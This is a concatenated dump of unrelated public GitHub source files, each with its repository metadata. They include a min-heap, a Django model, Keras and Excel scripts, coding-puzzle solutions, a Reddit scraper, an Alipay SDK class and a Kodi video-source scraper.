a78dbd6d284e4a6f01a1019211971bc9c0c8c61b | 0d942316070509955bad7ee774ac417e5c7b1235 | /datastructures/minheap.py | 34ab3809f1483e9783635f1a0761b4eb078ad011 | [] | no_license | rlavanya9/hackerrank | 4750ad48d5d249f1d58e6eff205e585f17e6a78b | 64e6686df62c1f1cdaa7dfb6d0c4525d236c197b | refs/heads/master | 2023-03-24T15:50:41.616353 | 2021-03-19T17:26:54 | 2021-03-19T17:26:54 | 349,502,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,044 | py | """
Min Heap Implementation in Python
"""
class MinHeap:
    """Array-backed binary min-heap.

    Index 0 of `heap_list` holds a dummy value so that, for the node stored
    at index i, its children live at 2*i and 2*i + 1 and its parent at i // 2.
    """

    def __init__(self):
        # Slot 0 is a placeholder; real elements start at index 1.
        self.heap_list = [0]
        self.current_size = 0

    def sift_up(self, i):
        """Bubble the element at index i toward the root while it is smaller
        than its parent, restoring the heap property after an insert."""
        parent = i // 2
        while parent > 0:
            if self.heap_list[i] < self.heap_list[parent]:
                self.heap_list[parent], self.heap_list[i] = (
                    self.heap_list[i],
                    self.heap_list[parent],
                )
            i, parent = parent, parent // 2

    def insert(self, k):
        """Add k to the heap and restore the heap property."""
        self.heap_list.append(k)
        self.current_size += 1
        self.sift_up(self.current_size)

    def sift_down(self, i):
        """Push the element at index i toward the leaves while any child is
        smaller, restoring the heap property after a delete."""
        # Loop while the node at i has at least a left child.
        while 2 * i <= self.current_size:
            smallest = self.min_child(i)
            if self.heap_list[i] > self.heap_list[smallest]:
                self.heap_list[smallest], self.heap_list[i] = (
                    self.heap_list[i],
                    self.heap_list[smallest],
                )
            i = smallest

    def min_child(self, i):
        """Return the index of the smaller child of the node at index i."""
        left = 2 * i
        right = left + 1
        if right > self.current_size:
            # Only a left child exists.
            return left
        return left if self.heap_list[left] < self.heap_list[right] else right

    def delete_min(self):
        """Pop and return the smallest value, or 'Empty heap' when empty."""
        # Length 1 means only the placeholder remains.
        if len(self.heap_list) == 1:
            return 'Empty heap'
        root = self.heap_list[1]
        # Move the last element to the root, drop the tail, and sift down.
        self.heap_list[1] = self.heap_list[self.current_size]
        self.heap_list.pop()
        self.current_size -= 1
        self.sift_down(1)
        return root
"""
Driver program
"""
# Same tree as above example.
my_heap = MinHeap()
my_heap.insert(5)
my_heap.insert(6)
my_heap.insert(7)
my_heap.insert(9)
my_heap.insert(13)
my_heap.insert(11)
my_heap.insert(10)
print(my_heap.delete_min()) # removing min node i.e 5 | [
"rangaswamy.lavanya@gmail.com"
] | rangaswamy.lavanya@gmail.com |
cd3e76b86f9d33e10b10335157e5d340ce734962 | 0fdc732fcdad1c0d76d6ec80cb6e25b6ec17d6e1 | /generic_views/display_views/models.py | 09bf2b21330b7de58380a241d44bb9f07e61cb04 | [
"MIT"
] | permissive | markbirds/Django-Code-Repo | 9b3c8bfba948dd8ea1be71e31cbfd2ef26bfa157 | b55762d2dab00640acf2e8e00ddc66716d53c6b5 | refs/heads/master | 2023-01-05T22:44:16.405853 | 2020-11-03T07:17:50 | 2020-11-03T07:17:50 | 299,615,438 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 459 | py | import uuid
from django.db import models
class DisplayViewModel(models.Model):
    """Model backing the generic display-view demos; keyed by a random UUID."""
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    name = models.CharField(unique=True,max_length=50)
    age = models.IntegerField()
    def get_absolute_url(self):
        # Local import -- presumably to avoid URLconf loading-order issues;
        # confirm before hoisting it to module level.
        from django.urls import reverse
        return reverse('display_views:detail_view', args=[str(self.id)])
    def __str__(self):
        return f'{self.name} - {self.id}'
| [
"fowenpatrick@gmail.com"
] | fowenpatrick@gmail.com |
b6edf643e623372579197f494e3f4691341ddcb7 | 4d56399b01d06946024822edcdf2b45bbc1dfe8f | /tests/app/TestMnistFlow.py | 8f88a7e2bb5e318f3bfeb41e1b6c8a2ca68253c7 | [] | no_license | fletch22/nba_win_predictor | 961b520b50cd5bebceb8c5d2bc91bc0dc71715ef | aff78780aca8a54c22e904cdcdee569278d4f5fc | refs/heads/master | 2023-08-11T02:44:22.613419 | 2020-04-09T21:32:38 | 2020-04-09T21:32:38 | 181,233,092 | 0 | 0 | null | 2021-08-25T14:57:49 | 2019-04-13T22:01:58 | Python | UTF-8 | Python | false | false | 2,443 | py | import warnings
from app.models.mnist_pretrained import get_vgg16_for_mnist
warnings.filterwarnings('ignore')
import os
from unittest import TestCase
from keras.layers import Convolution2D, MaxPooling2D
from keras.layers import Flatten, Dense
from keras.models import Sequential
from keras.preprocessing.image import ImageDataGenerator
from app.config import config
# Input images are resized to 44x44 (RGB) before being fed to the network.
dimension = 44
img_width, img_height = dimension, dimension
# MNIST images arranged in class sub-folders under the project data dir.
train_data_dir = os.path.join(config.DATA_FOLDER_PATH, 'mnist', 'train')
validation_data_dir = os.path.join(config.DATA_FOLDER_PATH, 'mnist', 'test')
# Standard MNIST split sizes.
train_samples = 60000
validation_samples = 10000
epoch = 30
batch_size = 32
class TestMnistFlow(TestCase):
    """Trains a classifier on MNIST folders via Keras generators.

    NOTE(review): Convolution2D(16, 5, 5) and fit_generator's
    samples_per_epoch/nb_epoch/nb_val_samples are Keras 1.x-style arguments --
    confirm the pinned Keras version before touching this flow.
    """
    def get_model_simple(self):
        # Small two-conv CNN alternative to the VGG16 model used below.
        model = Sequential()
        model.add(Convolution2D(16, 5, 5, activation='relu', input_shape=(img_width, img_height, 3)))
        model.add(MaxPooling2D(2, 2))
        model.add(Convolution2D(32, 5, 5, activation='relu'))
        model.add(MaxPooling2D(2, 2))
        model.add(Flatten())
        model.add(Dense(1000, activation='relu'))
        model.add(Dense(10, activation='softmax'))
        # ** Model Ends **
        model.compile(loss='categorical_crossentropy',
                      optimizer='rmsprop',
                      metrics=['accuracy'])
        return model
    def test_flow(self):
        # ** Model Begins **
        model = get_vgg16_for_mnist((dimension, dimension, 3), 10)
        # model = self.get_model_simple()
        # Augment training data; validation only gets pixel rescaling.
        train_datagen = ImageDataGenerator(
            rescale=1. / 255,
            shear_range=0.2,
            zoom_range=0.2,
            horizontal_flip=True)
        test_datagen = ImageDataGenerator(rescale=1. / 255)
        # Class labels are inferred from the directory structure.
        train_generator = train_datagen.flow_from_directory(
            train_data_dir,
            target_size=(img_width, img_height),
            batch_size=batch_size,
            class_mode='categorical')
        validation_generator = test_datagen.flow_from_directory(
            validation_data_dir,
            target_size=(img_width, img_height),
            batch_size=batch_size,
            class_mode='categorical')
        model.fit_generator(
            train_generator,
            samples_per_epoch=train_generator.n,
            nb_epoch=epoch,
            validation_data=validation_generator,
            nb_val_samples=validation_samples, workers=12)
        # model.save_weights('mnistneuralnet.h5')
| [
"chris@fletch22.com"
] | chris@fletch22.com |
a4fd68b0396381878daf049a641dec0c58de016d | c5cb9d60da5bab94ccf4dfb28185315521cc2736 | /tests/fountain/test_program.py | 7edc24568ab6f69d4fee090c0a2202d98ada73c7 | [] | no_license | Let-it-Fountain/code-generator | 4aa93ed7688e064d727619f68c902823b5c99e4e | 25560af09d008d5501eb4f68e8db5bb2aeaa8461 | refs/heads/master | 2016-08-12T18:43:30.896931 | 2016-01-07T20:16:02 | 2016-01-07T20:38:42 | 49,221,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,219 | py | import unittest
from fountain.command import ChangeNozzlePressureAndColorFountainCommand
from fountain.program import FountainProgram
class TestFountainProgram(unittest.TestCase):
def test_parse_json(self):
json = """{
"version": 1,
"commands": [
{
"nozzle": 1,
"pressure": 42,
"color": "green",
"time": 5
},
{
"nozzle": 2,
"pressure": 3.14,
"color": "red",
"time": 2
},
{
"nozzle": 5,
"pressure": 0,
"color": "yellow",
"time": 10
}
]
}"""
program = FountainProgram.parse_json(json)
self.assertListEqual([ChangeNozzlePressureAndColorFountainCommand(1, 42, 'green', 5),
ChangeNozzlePressureAndColorFountainCommand(2, 3.14, 'red', 2),
ChangeNozzlePressureAndColorFountainCommand(5, 0, 'yellow', 10)],
program.commands)
| [
"0coming.soon@gmail.com"
] | 0coming.soon@gmail.com |
016b7f14678ca082a128d9d26d7fe538516f88ca | 298c86756b741b4c0b706f5178fd26d6d3b63541 | /src/301_400/0330_patching-array/patching-array.py | 272322d30bc46a5f36cd0da0e961270b3653ad2b | [
"Apache-2.0"
] | permissive | himichael/LeetCode | c1bd6afd55479440c21906bf1a0b79a658bb662f | 4c19fa86b5fa91b1c76d2c6d19d1d2ef14bdff97 | refs/heads/master | 2023-02-12T07:25:22.693175 | 2023-01-28T10:41:31 | 2023-01-28T10:41:31 | 185,511,218 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | class Solution:
def minPatches(self, nums: List[int], n: int) -> int:
patches, x = 0, 1
length, index = len(nums), 0
while x <= n:
if index < length and nums[index] <= x:
x += nums[index]
index += 1
else:
x <<= 1
patches += 1
return patches
| [
"michaelwangg@qq.com"
] | michaelwangg@qq.com |
8235e8dcebb8c85c71c21f2c8a9467bf62a6ff4b | e5a511e346f5be8a82fe9cb2edf457aa7e82859c | /Python/ListPrograms/shuffleList.py | 87719058859c7a7cc65a26310471c5e2ace1e816 | [] | no_license | nekapoor7/Python-and-Django | 8397561c78e599abc8755887cbed39ebef8d27dc | 8fa4d15f4fa964634ad6a89bd4d8588aa045e24f | refs/heads/master | 2022-10-10T20:23:02.673600 | 2020-06-11T09:06:42 | 2020-06-11T09:06:42 | 257,163,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | """Write a Python program to shuffle and print a specified list. """
from random import shuffle
words = list(input().split())
shuffle(words)
print(words) | [
"neha.kapoor070789@gmail.com"
] | neha.kapoor070789@gmail.com |
35e12a74b76bdfabf580cd443df340d7e4f27584 | 565548ff49844ed69ae16d5104e500f01c973402 | /models/PST.py | 2592e69433fc0f5746b4d5cfa9e4f09e85a9eae1 | [] | no_license | jaisenbe58r/Pebrassos | 159ce5a8b372590fd9368d9b5b3c1b0513895bba | 7516a1f7bbba78547af86a9858ee381224964d28 | refs/heads/master | 2023-02-27T05:42:50.652697 | 2021-01-31T20:57:59 | 2021-01-31T20:57:59 | 299,698,630 | 3 | 1 | null | 2021-01-31T20:58:01 | 2020-09-29T18:04:36 | Jupyter Notebook | UTF-8 | Python | false | false | 1,169 | py | """Copyright (c) 2020 Jaime Sendra Berenguer & Carlos Mahiques Ballester
Pebrassos - Machine Learning Library Extensions
Author:Jaime Sendra Berenguer & Carlos Mahiques Ballester
<www.linkedin.com/in/jaisenbe>
License: MIT
"""
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from Helpers import utils
from Model import Embed, Checkpoint
EPOCHS=80
PASOS=7
# Carga de datos para el entrenamiento
scaler, training_data, target_data, valid_data, valid_target, continuas, valid_continuas = utils.load_data(PASOS)
# Modelo a utilizar
model = Embed.crear_modeloEmbeddings(PASOS)
#Entrenamiento
history = model.fit([training_data['weekday'],training_data['month'],continuas], target_data, epochs=EPOCHS,
validation_data=([valid_data['weekday'],valid_data['month'],valid_continuas],valid_target))
# Guardamos Checkpoint del modelo
Checkpoint.save_model(model, scaler)
# Predicción de resultados
results = model.predict([valid_data['weekday'],valid_data['month'],valid_continuas])
print( 'Resultados escalados',results )
inverted = scaler.inverse_transform(results)
print( 'Resultados',inverted ) | [
"jsendra@autis.es"
] | jsendra@autis.es |
8760723ee95d31f6a5cbdb418e9be59736b266df | 931ae36e876b474a5343d0608ef41da6b33f1048 | /062.py | 65898c09041b8f9ab2b9ef1e6e95318adaac13bd | [] | no_license | mucollabo/py100 | 07fc10164b1335ad45a55b6af4767948cf18ee28 | 6361398e61cb5b014d2996099c3acfe604ee457c | refs/heads/master | 2023-01-27T13:48:57.807514 | 2020-12-10T12:49:10 | 2020-12-10T12:49:10 | 267,203,606 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | import openpyxl
from openpyxl.styles import Alignment
import os
# 워크북(Workbook) 객체 만들기
wb = openpyxl.Workbook()
# 시트(Sheet) 객체 만들기
ws = wb.create_sheet(index=0, title='Merge')
wb.remove(wb['Sheet'])
# 데이터 입력하기
tuple_of_rows = ((1, 2),
(3, 4),
(5, 6),
(7, 8),
(9, 10),
)
for row in tuple_of_rows:
ws.append(row)
print(row)
ws.merge_cells(start_row=1, start_column=1, end_row=2, end_column=2)
A1 = ws.cell(row=1, column=1)
A1.value = 'Merged'
A1.alignment = Alignment(horizontal='center', vertical='center')
# 워크북의 변경내용을 새로운 파일에 저장
wb.save(os.path.join(os.getcwd(), 'output', 'create_workbook3.xlsx'))
| [
"mucollabo@gmail.com"
] | mucollabo@gmail.com |
cff20af9ca952b1c601ab44b87a8efd7effd6b35 | cff2b7c96ca0355a44116f6d18f026da69e412b0 | /script.module.Galaxy/lib/resources/lib/sources/en/Galaxy (31).py | 393be8d1d8c6c5e1d22fd97aa6d10bfc39403e53 | [
"Beerware"
] | permissive | krazware/therealufo | cc836e4e7049d277205bb590d75d172f5745cb7d | 4d6341c77e8c2cc9faec0f748a9a2d931b368217 | refs/heads/master | 2020-03-19T00:41:22.109154 | 2019-11-12T05:06:14 | 2019-11-12T05:06:14 | 135,496,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,918 | py | '''
The Martian Add-on
***FSPM was here*****
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re, urlparse, urllib, base64
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import cache
from resources.lib.modules import dom_parser2
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['solarmovie.net']
self.base_link = 'http://solarmovie.net'
self.search_link = '/search-movies/%s.html'
def movie(self, imdb, title, localtitle, aliases, year):
try:
clean_title = cleantitle.geturl(title)
search_url = urlparse.urljoin(self.base_link, self.search_link % clean_title.replace('-', '+'))
r = cache.get(client.request, 1, search_url)
r = client.parseDOM(r, 'div', {'id': 'movie-featured'})
r = [(client.parseDOM(i, 'a', ret='href'),
re.findall('.+?elease:\s*(\d{4})</', i),
re.findall('<b><i>(.+?)</i>', i)) for i in r]
r = [(i[0][0], i[1][0], i[2][0]) for i in r if
(cleantitle.get(i[2][0]) == cleantitle.get(title) and i[1][0] == year)]
url = r[0][0]
return url
except Exception:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
url = {'imdb': imdb, 'tvdb': tvdb, 'tvshowtitle': tvshowtitle, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if url == None: return
url = urlparse.parse_qs(url)
url = dict([(i, url[i][0]) if url[i] else (i, '') for i in url])
url['premiered'], url['season'], url['episode'] = premiered, season, episode
try:
clean_title = cleantitle.geturl(url['tvshowtitle'])+'-season-%d' % int(season)
search_url = urlparse.urljoin(self.base_link, self.search_link % clean_title.replace('-', '+'))
r = cache.get(client.request, 1, search_url)
r = client.parseDOM(r, 'div', {'id': 'movie-featured'})
r = [(client.parseDOM(i, 'a', ret='href'),
re.findall('<b><i>(.+?)</i>', i)) for i in r]
r = [(i[0][0], i[1][0]) for i in r if
cleantitle.get(i[1][0]) == cleantitle.get(clean_title)]
url = r[0][0]
except:
pass
data = client.request(url)
data = client.parseDOM(data, 'div', attrs={'id': 'details'})
data = zip(client.parseDOM(data, 'a'), client.parseDOM(data, 'a', ret='href'))
url = [(i[0], i[1]) for i in data if i[0] == str(int(episode))]
return url[0][1]
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
r = cache.get(client.request, 1, url)
try:
v = re.findall('document.write\(Base64.decode\("(.+?)"\)', r)[0]
b64 = base64.b64decode(v)
url = client.parseDOM(b64, 'iframe', ret='src')[0]
try:
host = re.findall('([\w]+[.][\w]+)$', urlparse.urlparse(url.strip().lower()).netloc)[0]
host = client.replaceHTMLCodes(host)
host = host.encode('utf-8')
sources.append({
'source': host,
'quality': 'SD',
'language': 'en',
'url': url.replace('\/', '/'),
'direct': False,
'debridonly': False
})
except:
pass
except:
pass
r = client.parseDOM(r, 'div', {'class': 'server_line'})
r = [(client.parseDOM(i, 'a', ret='href')[0], client.parseDOM(i, 'p', attrs={'class': 'server_servername'})[0]) for i in r]
if r:
for i in r:
try:
host = re.sub('Server|Link\s*\d+', '', i[1]).lower()
url = i[0]
host = client.replaceHTMLCodes(host)
host = host.encode('utf-8')
if 'other'in host: continue
sources.append({
'source': host,
'quality': 'SD',
'language': 'en',
'url': url.replace('\/', '/'),
'direct': False,
'debridonly': False
})
except:
pass
return sources
except Exception:
return
def resolve(self, url):
if self.base_link in url:
url = client.request(url)
v = re.findall('document.write\(Base64.decode\("(.+?)"\)', url)[0]
b64 = base64.b64decode(v)
url = client.parseDOM(b64, 'iframe', ret='src')[0]
return url
| [
"krazinabox@gmail.com"
] | krazinabox@gmail.com |
084b701db876a7a9cc96de46ba22410822435bef | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_201/2768.py | 40e17f65e0ef41dbbc7a6fbe6147c990164a2ac2 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 958 | py | T = int(input())
for t in range(1, T + 1):
result = ""
N, K = [int(i) for i in input().split(" ")]
if N == K:
result = "{} {}".format(0, 0)
else:
s = [0 for i in range(N)]
for c in range(K):
Ls = [0 for i in range(N)]
Rs = [0 for i in range(N)]
for i in range(N):
if s[i] == 0:
try:
Ls[i] = s[i::-1].index(1) - 1
except ValueError:
Ls[i] = i
try:
Rs[i] = s[i+1:].index(1)
except ValueError:
Rs[i] = N - i - 1
mini = [min(Ls[i], Rs[i]) if s[i] == 0 else -1 for i in range(N)]
minimum = max(mini)
minIndex = [i for i in range(N) if mini[i] == minimum]
maxi = [max(Ls[i], Rs[i]) if i in minIndex else -1 for i in range(N)]
maxIndex = maxi.index(max(maxi))
maximum = max(maxi)
if len(minIndex) == 1:
s[minIndex[0]] = 1
else:
s[maxIndex] = 1
result = "{} {}".format(maximum, minimum)
print("Case #{}: {}".format(t, result)) | [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
c92647660bee53af23986221cb7ab6c32ab5ce7f | 8a3d282ffb9830b01a3b698e2930ba8da6617d99 | /Lesson4/exercise1.py | 325205e8b230c4e4ebd0d2c7fbf211e9164ab04a | [] | no_license | papri-entropy/pynet-py3 | 08ba96adc9e0163990c7a8064ed8207b898748ff | 5554fa8a61b2e57f652046815e60f1b6db361d1e | refs/heads/master | 2023-04-03T17:51:45.105739 | 2021-04-15T14:33:05 | 2021-04-15T14:33:05 | 344,288,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,490 | py | #!/usr/bin/env python
"""
1. Create a dictionary representing a network device. The dictionary should have key-value pairs representing the 'ip_addr', 'vendor', 'username', and 'password' fields.
Print out the 'ip_addr' key from the dictionary.
If the 'vendor' key is 'cisco', then set the 'platform' to 'ios'. If the 'vendor' key is 'juniper', then set the 'platform' to 'junos'.
Create a second dictionary named 'bgp_fields'. The 'bgp_fields' dictionary should have a keys for 'bgp_as', 'peer_as', and 'peer_ip'.
Using the .update() method add all of the 'bgp_fields' dictionary key-value pairs to the network device dictionary.
Using a for-loop, iterate over the dictionary and print out all of the dictionary keys.
Using a single for-loop, iterate over the dictionary and print out all of the dictionary keys and values.
"""
from pprint import pprint
device = {
'ip_addr': '4.4.4.4',
'vendor': 'cisco',
'username': 'admin',
'password': 'secret'
}
print("*" * 80)
print(device['ip_addr'])
print("*" * 80)
if device['vendor'].lower() == 'cisco':
device['platform'] = 'ios'
elif device['vendor'].lower() == 'juniper':
device['platform'] = 'junos'
print("*" * 80)
print(device['platform'])
print("*" * 80)
bgp_fields = {
'bgp_as': 65000,
'peer_as': 65001,
'peer_ip': "1.1.1.2"
}
device.update(bgp_fields)
for key in device.keys():
print(key)
print("*" * 80)
for key, value in device.items():
print(f"{key:>15} ---> {value:>15}") | [
"cosminpetrache4@gmail.com"
] | cosminpetrache4@gmail.com |
986648f850c2baa86b81a830fe9aa86b1cb75ddc | ff60a647a3cc566220f5cefc8ddec7e1f865ac20 | /0x13-count_it/2-recurse.py | 01d85f2ffb597b45e64d288db5d85c4b052c9f42 | [] | no_license | mag389/holbertonschool-interview | cf6c2cc568bc321dcd705fbb76ad1e13ff8ba4f7 | 6f5b621d7a03efb990970e8c28ac41c1498aa6cd | refs/heads/main | 2023-07-19T05:57:50.296276 | 2021-09-09T14:34:02 | 2021-09-09T14:34:02 | 319,713,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,447 | py | #!/usr/bin/python3
""" script to scrape and count words from reddit hot posts
"""
import requests
import time
import urllib
import sys
def recurse(subreddit, hot_list=[], after=""):
""" uses reddit api to give top 10 hot posts
in a subreddit
"""
custom_user = {"User-Agent": "custom"}
url = "https://www.reddit.com/r/" + subreddit + "/hot.json"
print(url)
if after == "":
params = {'limit': 1, 'count': 1}
else:
params = {'limit': 1, 'count': 1, 'after': after}
params = {'after': after}
# print("right before request")
res = requests.get(url,
headers=custom_user, params=params,
allow_redirects=False)
# print(res.status_code)
if res.status_code != 200:
return(None)
else:
info = res.json()
# print(info)
children = info.get('data').get('children')
if children is None or len(children) == 0:
return (hot_list)
for child in children:
hot_list.append(child.get('data').get("title"))
# child = children[len(children) - 1]
# title = child.get('data').get("title")
# print(title)
# hot_list.append(child.get('data').get("title"))
after = info.get('data').get('after')
print(after)
if after == 'null' or after is None:
return (hot_list)
return (recurse(subreddit, hot_list, after))
| [
"mag389@cornell.edu"
] | mag389@cornell.edu |
2abce665437b0f3f3ab17d70c43c98a0c6ebc291 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/domain/AlipayInsSceneFamilydoctorItemBatchqueryModel.py | 4a78f51f516c09e2559b61451709e855a8a875f6 | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 3,638 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayInsSceneFamilydoctorItemBatchqueryModel(object):
def __init__(self):
self._ant_ser_contract_no = None
self._disease_name_list = None
self._emergency = None
self._general_name_list = None
@property
def ant_ser_contract_no(self):
return self._ant_ser_contract_no
@ant_ser_contract_no.setter
def ant_ser_contract_no(self, value):
self._ant_ser_contract_no = value
@property
def disease_name_list(self):
return self._disease_name_list
@disease_name_list.setter
def disease_name_list(self, value):
if isinstance(value, list):
self._disease_name_list = list()
for i in value:
self._disease_name_list.append(i)
@property
def emergency(self):
return self._emergency
@emergency.setter
def emergency(self, value):
self._emergency = value
@property
def general_name_list(self):
return self._general_name_list
@general_name_list.setter
def general_name_list(self, value):
if isinstance(value, list):
self._general_name_list = list()
for i in value:
self._general_name_list.append(i)
def to_alipay_dict(self):
params = dict()
if self.ant_ser_contract_no:
if hasattr(self.ant_ser_contract_no, 'to_alipay_dict'):
params['ant_ser_contract_no'] = self.ant_ser_contract_no.to_alipay_dict()
else:
params['ant_ser_contract_no'] = self.ant_ser_contract_no
if self.disease_name_list:
if isinstance(self.disease_name_list, list):
for i in range(0, len(self.disease_name_list)):
element = self.disease_name_list[i]
if hasattr(element, 'to_alipay_dict'):
self.disease_name_list[i] = element.to_alipay_dict()
if hasattr(self.disease_name_list, 'to_alipay_dict'):
params['disease_name_list'] = self.disease_name_list.to_alipay_dict()
else:
params['disease_name_list'] = self.disease_name_list
if self.emergency:
if hasattr(self.emergency, 'to_alipay_dict'):
params['emergency'] = self.emergency.to_alipay_dict()
else:
params['emergency'] = self.emergency
if self.general_name_list:
if isinstance(self.general_name_list, list):
for i in range(0, len(self.general_name_list)):
element = self.general_name_list[i]
if hasattr(element, 'to_alipay_dict'):
self.general_name_list[i] = element.to_alipay_dict()
if hasattr(self.general_name_list, 'to_alipay_dict'):
params['general_name_list'] = self.general_name_list.to_alipay_dict()
else:
params['general_name_list'] = self.general_name_list
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayInsSceneFamilydoctorItemBatchqueryModel()
if 'ant_ser_contract_no' in d:
o.ant_ser_contract_no = d['ant_ser_contract_no']
if 'disease_name_list' in d:
o.disease_name_list = d['disease_name_list']
if 'emergency' in d:
o.emergency = d['emergency']
if 'general_name_list' in d:
o.general_name_list = d['general_name_list']
return o
| [
"jishupei.jsp@alibaba-inc.com"
] | jishupei.jsp@alibaba-inc.com |
de6378f101239d52c399e53d1291b84af868b941 | f305f84ea6f721c2391300f0a60e21d2ce14f2a5 | /22_专题/implicit_graph/RangeFinder/Finder-fastset.py | ce22f608c5a5bd551f47efa704b5fe7821690be3 | [] | no_license | 981377660LMT/algorithm-study | f2ada3e6959338ae1bc21934a84f7314a8ecff82 | 7e79e26bb8f641868561b186e34c1127ed63c9e0 | refs/heads/master | 2023-09-01T18:26:16.525579 | 2023-09-01T12:21:58 | 2023-09-01T12:21:58 | 385,861,235 | 225 | 24 | null | null | null | null | UTF-8 | Python | false | false | 3,937 | py | # 寻找前驱后继/区间删除
from typing import Optional
class Finder:
"""利用位运算寻找区间的某个位置左侧/右侧第一个未被访问过的位置.
初始时,所有位置都未被访问过.
"""
__slots__ = "_n", "_lg", "_seg"
@staticmethod
def _trailingZeros1024(x: int) -> int:
if x == 0:
return 1024
return (x & -x).bit_length() - 1
def __init__(self, n: int) -> None:
self._n = n
seg = []
while True:
seg.append([0] * ((n + 1023) >> 10))
n = (n + 1023) >> 10
if n <= 1:
break
self._seg = seg
self._lg = len(seg)
for i in range(self._n):
self.insert(i)
def insert(self, i: int) -> None:
for h in range(self._lg):
self._seg[h][i >> 10] |= 1 << (i & 1023)
i >>= 10
def erase(self, i: int) -> None:
for h in range(self._lg):
self._seg[h][i >> 10] &= ~(1 << (i & 1023))
if self._seg[h][i >> 10]:
break
i >>= 10
def next(self, i: int) -> Optional[int]:
"""返回x右侧第一个未被访问过的位置(包含x).
如果不存在,返回None.
"""
if i < 0:
i = 0
if i >= self._n:
return
seg = self._seg
for h in range(self._lg):
if i >> 10 == len(seg[h]):
break
d = seg[h][i >> 10] >> (i & 1023)
if d == 0:
i = (i >> 10) + 1
continue
i += self._trailingZeros1024(d)
for g in range(h - 1, -1, -1):
i <<= 10
i += self._trailingZeros1024(seg[g][i >> 10])
return i
def prev(self, i: int) -> Optional[int]:
"""返回x左侧第一个未被访问过的位置(包含x).
如果不存在,返回None.
"""
if i < 0:
return
if i >= self._n:
i = self._n - 1
seg = self._seg
for h in range(self._lg):
if i == -1:
break
d = seg[h][i >> 10] << (1023 - (i & 1023)) & ((1 << 1024) - 1)
if d == 0:
i = (i >> 10) - 1
continue
i += d.bit_length() - 1024
for g in range(h - 1, -1, -1):
i <<= 10
i += (seg[g][i >> 10]).bit_length() - 1
return i
def islice(self, begin: int, end: int):
"""遍历[start,end)区间内的元素."""
x = begin - 1
while True:
x = self.next(x + 1)
if x is None or x >= end:
break
yield x
def __contains__(self, i: int) -> bool:
return not not self._seg[0][i >> 10] & (1 << (i & 1023))
def __iter__(self):
yield from self.islice(0, self._n)
def __repr__(self):
return f"FastSet({list(self)})"
if __name__ == "__main__":
...
# 前驱后继
def pre(pos: int):
return next((i for i in range(pos, -1, -1) if ok[i]), None)
def nxt(pos: int):
return next((i for i in range(pos, n) if ok[i]), None)
def erase(left: int, right: int):
for i in range(left, right):
ok[i] = False
from random import randint
for _ in range(100):
n = randint(1, 100)
F = Finder(n)
for i in range(n):
F.insert(i)
ok = [True] * n
for _ in range(100):
e = randint(0, n - 1)
F.erase(e)
erase(e, e + 1)
for i in range(n):
assert F.prev(i) == pre(i), (i, F.prev(i), pre(i))
assert F.next(i) == nxt(i), (i, F.next(i), nxt(i))
print("Done!")
| [
"lmt2818088@gmail.com"
] | lmt2818088@gmail.com |
1ef40b11592352d2630e7e1c9536c6dc9c1fa5ee | 2463da77ab902e3728a71fc0a09fb92f687e755d | /contentful_proxy/handlers/files.py | ac9a51f1a693722ac68d98e5b4cf05a01ac3cd13 | [
"MIT"
] | permissive | stanwood/gae-contentful-proxy | 5c2f0aa41819483aa8e428134cc94d4f26c90141 | 739a8b370eb714e27a9f2b50e3772701f52f81df | refs/heads/master | 2020-03-24T20:41:06.798623 | 2019-02-28T10:22:46 | 2019-02-28T10:22:46 | 142,991,557 | 2 | 0 | MIT | 2019-02-28T10:22:47 | 2018-07-31T09:19:16 | Python | UTF-8 | Python | false | false | 4,576 | py | # The MIT License (MIT)
#
# Copyright (c) 2018 stanwood GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
